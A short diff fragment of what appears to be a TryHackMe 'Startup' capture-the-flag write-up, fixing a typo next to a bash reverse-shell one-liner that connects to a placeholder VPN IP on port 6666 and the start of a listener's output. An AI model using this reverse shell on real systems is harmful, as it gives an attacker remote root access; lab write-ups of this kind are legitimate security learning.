viksant/viksant.github.io/_posts/2022-10-22-Startup_machine_THM.md

 bash -i >& /dev/tcp/{VPN IP}/6666 0>&1
 ```

-If yo done it correctly, you are now root using a reverse shell
+If you done it correctly, you are now root using a reverse shell

 ```ruby
 listening on [any] 6666 ...